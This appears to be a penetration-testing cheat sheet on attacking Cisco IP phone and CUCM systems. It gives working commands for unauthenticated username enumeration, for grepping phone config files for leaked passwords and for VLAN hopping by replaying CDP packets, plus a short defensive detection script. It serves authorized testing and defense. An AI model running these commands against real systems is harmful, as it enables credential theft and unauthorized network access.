# SIP / VoIP

* <https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4>
* <https://www.hackingarticles.in/penetration-testing-on-voip-asterisk-server-part-2/>

## Cisco IP Phones

* <https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/>
* <https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/>
* <https://github.com/n00py/CUCMe/blob/main/cucme.sh>
* <https://github.com/trustedsec/SeeYouCM-Thief>
* <https://github.com/llt4l/iCULeak.py>
* <https://github.com/Bond-o/vnum>

Scrape Cisco IP Phone web interfaces by IP to get the corresponding host names:

```
$ for i in `cat phones_ip.txt`; do curl -s http://$i | grep -oP 'SEP[A-Z0-9]+' | uniq | tee -a phones.txt; done
```

Enumerate usernames on a Cisco CUCM server:

```
$ bash cucme.sh CUCM01.megacorp.local
Or
$ python3 thief.py -H CUCM01.megacorp.local --userenum
Or
$ curl -sk 'https://cucm01.megacorp.local:8443/cucm-uds/users?lastName=' | grep -oP '<firstName>.*?</firstName><lastName>.*?</lastName>' | sort -u | tee cucm_users.txt
```

Enumerate credential leaks on Cisco IP Phones:

```
$ python3 iCULeak.py -nA -c CUCM01.megacorp.local -l phones.txt 192.168.1.11
Or
$ for i in `cat phones.txt`; do curl -s http://cucm01.megacorp.local:6970/$i.cnf.xml | grep -i pass; done
```
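
Seen from the defensive side, the config-file loop above stands out because a real phone only requests its own `SEP<MAC>.cnf.xml`. The following detection sketch is an added example (not from the original page or any of the linked tools) that flags clients fetching configs for many distinct device names; the log format, sample lines and `max_devices` threshold are constructed assumptions:

```python
import re
from collections import defaultdict

# Constructed sample in a simplified "client method path status" format.
# Assumption: proxy, firewall or capture exports can be reduced to this shape;
# it is not a native CUCM log format.
SAMPLE_LOG = """\
10.10.20.31 GET /SEPAAAABBBB0001.cnf.xml 200
10.10.20.32 GET /SEPAAAABBBB0002.cnf.xml 200
10.10.20.31 GET /SEPAAAABBBB0001.cnf.xml 200
10.10.99.7 GET /SEPAAAABBBB0001.cnf.xml 200
10.10.99.7 GET /SEPAAAABBBB0002.cnf.xml 200
10.10.99.7 GET /SEPAAAABBBB0003.cnf.xml 404
10.10.99.7 GET /SEPAAAABBBB0004.cnf.xml 200
10.10.20.33 GET /XMLDefault.cnf.xml 200
malformed line
"""

# Same SEP[A-Z0-9]+ device-name pattern the page greps for, plus .cnf.xml
CONFIG_RE = re.compile(r"^(\S+) GET /(SEP[A-Z0-9]+)\.cnf\.xml \d{3}$")


def distinct_devices_per_client(log_text):
    """Map each client IP to the set of device names whose config it requested."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = CONFIG_RE.match(line.strip())
        if m:
            # Failed lookups (404) count too: guessing names is also a signal.
            seen[m.group(1)].add(m.group(2))
    return dict(seen)


def flag_config_harvesting(log_text, max_devices=2):
    """Return {client: sorted device names} for clients above the threshold."""
    # A phone normally fetches only its own config, so the threshold is small.
    # Allow-list legitimate provisioning hosts separately (assumption).
    return {
        client: sorted(devices)
        for client, devices in distinct_devices_per_client(log_text).items()
        if len(devices) > max_devices
    }


if __name__ == "__main__":
    for client, devices in flag_config_harvesting(SAMPLE_LOG).items():
        print(f"{client} requested {len(devices)} device configs: {', '.join(devices)}")
```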

### VLAN Hopping on Cisco Voice

* <https://savvyadmin.com/vlan-hopping-on-cisco-voice-enabled-switch-ports/>

Capture the first CDP advertisement while plugged through the phone:

```
$ sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
$ sudo tcpdump -vr cdp-packet.cap
```

Replay it once a minute to simulate a legit phone device:

```
$ sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap"
```

Configure a sub-interface to access the voice VLAN:

```
$ sudo vconfig add eth0 1337
$ sudo ifconfig eth0.1337 up
$ sudo dhclient -v eth0.1337
```

